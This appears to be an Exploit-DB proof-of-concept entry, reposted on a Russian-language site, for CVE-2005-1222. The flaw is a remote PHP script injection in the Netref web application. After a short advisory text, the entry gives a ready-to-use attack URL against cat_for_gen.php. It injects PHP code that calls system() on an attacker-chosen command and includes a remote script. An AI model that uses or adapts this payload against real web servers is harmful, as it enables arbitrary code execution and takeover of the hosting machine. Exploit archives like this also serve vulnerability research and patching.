- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 25467
- Проверка EDB
-
- Пройдено
- Автор
- JAGUAR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-1222
- Дата публикации
- 2005-04-20
Код:
source: https://www.securityfocus.com/bid/13275/info
A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer.
http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>- Источник
- www.exploit-db.com
